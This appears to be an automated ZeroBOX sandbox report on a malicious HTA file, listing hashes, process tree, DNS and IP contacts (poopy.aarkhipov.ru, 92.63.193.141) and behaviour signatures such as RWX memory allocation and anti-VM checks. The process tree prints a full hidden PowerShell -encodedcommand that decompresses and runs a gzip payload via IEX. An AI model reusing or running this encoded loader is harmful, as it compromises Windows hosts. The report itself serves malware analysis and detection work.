Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 30, 2024, 9:42 a.m.	May 30, 2024, 10:22 a.m.

Size	7.5KB
Type	HTML document, ASCII text, with very long lines
MD5	`976649b232d3525dd239f7139a65dd92`
SHA256	`ef893465333cd3d99753d3c2cec442e24b8d3814906bf9ce0df77ea68e243995`
CRC32	`5B73C537`
ssdeep	`192:WVEyw24f+dODSc65c2wWwLR4JObTBQ1imiUPasrHUdjCul1Pxohtr:cC2BWoc9LR4UmiL8L9iPChtr`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\logista.hta
1072
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFQAQgBMACsASABIADYARgBQADAAUQBDAEsANABRADEAUgB3AGkAWgAxAFUAaABqAGYASQBBAE4AZABzAEEAMgA1AG4AcQBqAHkARQBjAEQAQgBsAC8AWQBiAFkAeAA1AFoALwA3ADcAbABnADEAawBNAGoAdgBKADcAawBpADcAawBWAEQANgBxAEsAcQB1AGUAdQByAHAANgByAEsASwA4AEwAMgBLAEkAOABmAEMAVQBtAEEAagA0AGwANQBIAFUAZQB3AEUAUAB0AEUAbwBsAFcANAA5AFkANABjAGMASABBAGYARQBWACsASgBiAHUAYgBSAEsAZgBBAHYAbgBXAC8AbgBnAGQAWQAzAHcAYQB4AGcARgAxAHEAdABoADIAeABHAEsAWQArAEwAdgAwAHMAMwBJAGkAQQB5AFAAcQBOAHcAZQBqAE8AagBWAEMAKwB6AEUAUgBWAFcAaQBtAE8AUwBDAHkARQA0AGkAUgBOADcAYwBsAEcANgBLAHAAYwBTAFAAagBSAFYANgA5AFEAMwBzAEgATgBDAHIAaAAvAEEAbQBzAEcATQA0AHEATABLAGsAdwA1AEEATgBQAE0AUAB4AFgANwA1ADgAWQBaAEkAbwBRAGoANAArAHoAMgBzADkAaABPAGsANABSAHAANwBwAE8AaQBpAHUAawBNAFIAMwBZAHIAcABCAEUAYgBwAC8ATgByAGYASQB3AHMAVABmAHgATwAxAHIAcgBlAGMARwBwAHUARgBlAHgARABMAEcAcwBEAFkAUQBGAE8AMwBiACsAZAA0AHcAcwBJAHcAOABnAHAAbwBhAHUAZwA2AHUAbABQAC8ANgBxADAAdwB1ADcAKwBzAHYATgBXADYAZgBHAEcANQBjAEsAYQB0AFoAagBKAEYAWABzADEAMgAzAFQAQgBJAC8AeQBQAHgAQQBMAFEAdABSAHAAUwB3ADUAVgBoAFQARQB3AFEAcgBYAHAAbwA3AGYAYgBOAFEAbQBoAGYAZAB5ADQAYgB4ADAAOQByADEATQBYAGkASgBiAGgAdwBiAEUAOABYAG0AUQB1AGQAVwB6AFQAcQBVAE0AdwB4AEYAZwBRADUAOAB4AEwARgBlAEoAWgBYADcAZQA4AHUAVwBGACsAUABiAG0AagBaAEwANAAyAFAARgBRAFQAZgBBAHgAaQBvAEoAUQBSAGQASABCAHMAVgBCAGMANgB4AHUAKwA3AFMASQBGAHIAVQBDAHQASABFAE0ASwAvAFgAVwBaAEIAQwBjAGkAaABKAFAASQBKADYANgArAGcATgA0AGgAMgBLAEgASwByAFoAKwA0AGIAaABYAHMATAB2AC8AVQA3AGsAdABGAFIAdQBrAFYAMwBEADkAVgBxAHIAeABYAEEAcQBrAFIAagBzAGoAcQBoAFIATgAvAEEAbwBkAFUAOABPAFoAcwBEAHMATAA1AHoAZgB0ADMANQBDAEwAaAA3AHoAZQBDAGsAYQBVAGYAcABRACsAbwBhAGkATQBYAHIAUQAyAE0AWABqAEgAZwArADQANgByAHAAWgB1AGIAWgBUAEYARQBFAEUAOQBsAEYATQBSAE8AbwBmAGUAVgBvAEsAcQBFAEIARQA0AFkATwBJAGkAeQBQAEoAMQBhAGwAQwBEAHkANQBXAGQAKwB6AHMAZABlAE4AZQBQAHEAcAA0AGIAcQBWADYAMgBMAHoAagBrADkAWgB6ACsAKwBFAGsAcwA5AGMATwB5AFgAMABnADEAWgB1AHIAQQBuAFgAMwA4ADEARQA4AGUAMQBVAFoAVAB2AGYAMwA0AGIAVwBMAFIAeQBmAE0AUgBtAHYAdQBFADUAMQBwAFgAdwBsAFkAOQB5AGgAbABZAHUASwB2AEMAbwBYAGMAVgBrADgATABOAFMAdgBtAHcAZwBtADcAMgBnAFUAOAA0AEIAWABmADYAdQB4AG4AawBPAGYAdABQAHQAbgBwADIAagBMAGMAaAA3AEQARgA0AEIASgBjAGgAZgBuAFQAbgBuAHMARgBJAFcAZgBBAGwANQBnAE4AOQA1AEQAagBTADkAWABjAEUAMQBRADEAZgBwAHkAOQBYAEsAcgBxAGYAbgA4ADUAegBMAGoARwB2AEUAYwBaAFUAWQBKAFgARABQAHIAUwBxAGgASQBzAE4ARgBkAHAAVwBnAC8AZABpADUAYgBOAEUASgBEAG8AcABoACsAYQBlADcAVQB1AEoAaQB4AHoASgBpAGYARABYADMAUQBuADQAQQA2AGUAVgBvAEoAdgBEAGgAeABpAFEAVwBaAEIAZABnADAATgBRAFEAVwBZADcAaAA1AHEAaABVAGkAYgA1AGoAbwAyADYAbQBPAHUAdQByAEMAKwBVAFAATQBXAEUATQAxADQAVQByAEIANQBZAE8AawBCAE4AWQB5AGIARgBRAGMAYwA2AFoAeQBLADcAKwBPAHoALwBJAG0AbwBxAHcANABJAFUAdQA4AGsAQwA2AHEARQBLADgAYQA2AHkAaAA1AGwAeAB1AFYARQBFADMAWQA0ADMAcwA4AG4AOQB3ACsAMwBwAFAAegBwAGMAaQB4ACsAbwBLADAAagB1AG4AZwBRAEMAcQBHACsAQQBxAG8AVABzAFIAaAByAHAAVwByAHYANQBHAHYAUAAvAE4AdgBWADkATAB6AEMAOQB1AE0AaABHADYASgBMAEoAUwBYAE0AUgBsAE4AOABQADUAZABiAGsAOQB2AEYAcgA1ADgALwBMADEARABjAGsAQwB0AHcAZwBEAFoAbgB3AFUAZQBGADAAagBSAHUAMgBXAFcAaABTAHgAUwByAG4AWgBTAGYAWgBDAEoAbQAzAEgANwBhAGoASABIAGYAagArAHYAcwA5AHAAOABEAHYAQQByADcAbgBuAHUAZQBGAFEAVgBNAEsAdQBNAHIAUwA0ADUASABuAFUAcAA4AFMAVgBNAE8ANgB3AHIAUwBSAE4AaABFAFQAcgBVAGsAMgBlAEEAcgBuAFQAdgBzAGUAdABoAE0ATgB6AE0ASwA4AG4AWABxAHQAdQBoADgASgBCAGgAcgBYADQAYwBkACsAUABXAGUASABBADAAdgAzAEcAUAB1AEQAYgBhACsAZgBwAFkAdQBlAHMAUAB6AGIAVAB1AGoAawBUACsARQBlAHoAeAA3AGYANgBlAHMAegBuADgAbgAzAGgAMABPAFgAMwB6AEYATQBBADQAMwA4AEkAQgB5AFkAUQBRAGEALwBUAEQAdgAxAHUAYQByAGMAUQBKADcAYgBSAGIARwBpAGwAVABkAHgAQgB4AHYAcQBZAEQAZgBRADcAbABhAHIAMwA5AEUAdwBlADYAbAB3AG8AcQA3ADQAOQBOAE8AdABqAFgAcABSAFAARABRADQAZgBLAGIAdQB2AFUARABZAFgATAAyAHgAOQB6AHoAVgBIADUAaQBDAEUATwBJAFgAbQBXAG0AMwA3AFkAcQBhAHEAMwBjAHoAYQBKAGEAYwBSAEkAMgAyAHQAdgBqAHkAMABCAC8AdgBPAGcAMwAxAHEAWgBMAHoAYwBBAGgAeQBPAGEAaQBaAHQANQBtADMANwBhAE0AMwA0ADEASgByAEoAdwA2AHcALwBsADMAdABnAGQANQA5AE0AMQA2ADIAKwBwAEQAYgBCAHQAbQBvAGYAVQAzAHMAUwBQADQAcwBhAG4AagBkAEgAaAB0AGYASwBNAHIALwBGAEMARgB2AGgATwBMAFIAQwByAE0ALwBFAGQAbQBSAGsAVABEAGgAMABrAE4AbABkADQAVgB4AFgASABDADcAVwA0AGgATwBIAHoALwA2AHAAcQBwAEwAWgBZAE4AdgB0AGEAKwB3AEEAYgBQAHUATQBKAEUARQB1AGoAQQBjAGUAVABVAEIAbQBFAEQAdABnAHEAeABQAHQAQgBVAGYAYQBaAHUAMgB0ADEAWgBSAFQAUwBkAFgARgBxAGUATAB5AEIAcgB1AGgAWgBZADYAbQBWAEYAYgB2AGoAdABSAGQAUwA5AFoAMgBvAGMAeABPADMATABIAFEAYgB2AFMAcABRADAATwAvAGEAOQBqAEkAeQByAFIARABhADgAMAA5AGgAKwAwAEcAWQA3AE8AZQA4ADIAQgBpAHEAdABQAHAAbgBuAGEAeQBKAHoAbgA2AGEAbQB4AFEAbgBWAG0ANwBuADkAcgA4AGYAaABEAFAAcgBMADIANgBRAE4ANQBnAHMAdQBMAGQAZQB1AGQAeABKAGoAUgBFAGUAcwB3AHQATgBQADIANABZADMAVgBxAFkAZQByAHAAYwBhAGgAVABEAHkATwBXAEUAcgBVAEoAOQBUAFEAWQBjACsASgBNADMAUgAxAGwAbABzAGYARgBPAHMAUABqAFoAeQAxADkAWQBpAFoAMQBHAGYAegBwAE0AagBvAFYAUwB0AHIANABhAEcAcQA3AHoAbgB5AHkAYQBXAG0AcwBFAG8AeQBZAGMAUwByADIAZQBBAEYAeABLAFcAVQBPAEgAZABjAFoAYwA5ADMAZQBwAEcANAA5AG0ANQBRAG8ASwAvAHkAQwBVAGIAagA1AGcAcQBZAFcATQB1AHMAdgBVAGgAYgArAFgAMgBTAG4ASQBIAHQAVQBkAG4AcAB2AE0AbABrAG8AdgBUAEgAawB1AG0ANQByAHYAWABFAHEAagBiAGwAagBYADEAbgBYAHgAWQBtADcANgBFADMAMABRAEkAYgA1AE0AOAB1ADAAdwB2AG0AdQBTAHkAdQB1AFAARwBPADkAUgBiADcAVwBWADMAZAAxAEQAdgBTADQANgBTAFQAVQAyAEYAVAB1AGcANgAzAFIAMgBMAFYANwBZAEwAYwB4ADQAUgBZAEsANgA0AG0AYwBzAHEAdgBQAFEAQwBiAFIAZQBIAGUAZwBVAFUAOABNADIANQAzAEwAWABDAG8ATgBiAGUAQwBWAFEAaAAwAG4ARQAxAHIARwBkAGkAcgBwAHIARQBMAFAANgBhAGEAdABxAEQAdQA3AHAAKwBtAFcAeABOAE8AVQAxAHEATgBsAFIAVgBkADIASwByAGUAbQBOAEcAYQBkAHgANwAvAHAAMABRADEAdwBsAGQAdABJAFEAMgBlADMANQBaAG8ANgBOAFgAVQBlAGQATwA1AHgAdQB3ADMAbQBqAFoANgBBAE8ANQBsAHkAawBPAEsAdwAyADAAaABYAGUAMgBYAG0ASwBmADQAbwBmAEQAdwBjAEQAdgB6AHoASwBhAHcANwAyAFgAUQB4AGEAdQA0AGIASwAwAFkANwA4AGIAUQBwAFAAUABVADgAOQB4AGkAdgA5ADAAbABqADQAOABoAEQANgBzAEgAbwAyAHMAQgBUAGQAUwBvAFAAaABSAFAAdwBtAFkAcQAzAFEAawBQAGEAMgBoAHgAKwAzAEQAVABaAEgAdgBBAHcAOQBZAEkAMABCAGgANAA1AGQANwA2AFkANwBtAFAAZwBhAFMAYQB4AFEAaQBiAG4AWABEADEAaQBJACsAbwBXAFgASwAyAHYAMwBEADAAegBkAGwAbwBEAGMANgB2AEgAaQA4AGUAVwBsAEEAeQBhACsARwBSAE4AcQBLAE0AMABxAFEATwBXAE8AMQBGAFIATwBUAHkAQQB1AGMANwBxAC8ARgBRADQAKwBrAC8AcQBnAC8AQQAxAHIAMABtAHIASQBJAEkAdQA0ADMAVABLAG4AKwA1AC8ARQB2AG4AZwAzAHMAWABFAHAAZQA1AEEAdABZAEUAeQBWAGkAegBmADMAWgBIADUAOAAzAC8AWgBXAE0ATABLAFMAOQBHAHQAdgBaAHYAZQBtADAAYwB3ADEAbgB6AEkAQwAxAGgAUgA0AGcANwBHAHUAOABMADEAVwBRAGMAawBHAFYARwA4AE0AVgB3AG8AYQBOAEQARgBYAE4AOABnAFAAbwBqADQAUwB5ADgAeQBDAHAAeABjAG8AMQBMADUAdQBIADMAZQBvAGMAaABIAEwAcgBTAFcAMABIAHgAZQBLAHoAZgB0AHUAbwBHAFYAZAAwACsAZgB0AEQASABRAHkANQAwADcAcgBCAGQANABvAFMAWQB3AGIARABZACsASABKAEgARQBtAHkAQwAwAFQATwBlAFkAegBHAFMAMQBLAGoAcQBNAFMANABUAFgAUgB1AHMAcQArAE8AWABMAEEAcwBLAHIAdgBpAEUANABSAFAANABhAGIANgBvAEUAZABXAHgAUwBGAEoAWAAvAGIAMQBGAGsANgBjADkAQgBZAFkASQB3AHEAMQB5AE0AVgBmAFAAdQA2AHAAMABYAFAAMAA5AHgAaQAxAFAASQBDACsANQBSADQAbgB2AG8ALwB3AGoAOQBMADAAZgArAGQAMQBCAHoAMgBJAHIAMgA3AEEAMgAwAHcAcQBHAFAAawBTAEoATAA1AFcAKwBsAGsAcgBBAGkAMwBxADMASAB6AGcAawArAFAAdABDAGUANgBCAFMAYwBpADQASABuACsASAA0AGIAbQBQAEMAbABVAGoAeQA5AGwAVgB1AEQASgBBAFIAdQBSAHQAdwBhAHgAQQAvAGkASABzAEsAagA0ADIAWQBEAFAAbABlAGkAZABaAEsALwB3ADgAVABQAEwANwBEAHYAUgBHAG8ANABaACsAWAB2AGgASQBJAHMAQgBCADMAMAB2AFIAaQBZAHcARgBFAEUATABWAFYAdQB2AGoAQgAwAFYAWQBEADEAZgB3AEgALwBwAFUAVwBpADIAZwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA
  2084

Name	Response	Post-Analysis Lookup
poopy.aarkhipov.ru	A 92.63.193.141	92.63.193.141

IP Address	Status	Action
164.124.101.2	Active	Moloch
92.63.193.141	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 30, 2024, 9:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 30, 2024, 9:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 30, 2024, 9:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 30, 2024, 9:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 30, 2024, 9:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 30, 2024, 9:42 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 30, 2024, 9:42 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00692f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00692f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00692f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00692f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00692f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00692f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006939e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 30, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00693b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 30, 2024, 9:42 a.m.		1	1	0

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

poopy.aarkhipov.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 149 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02631000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
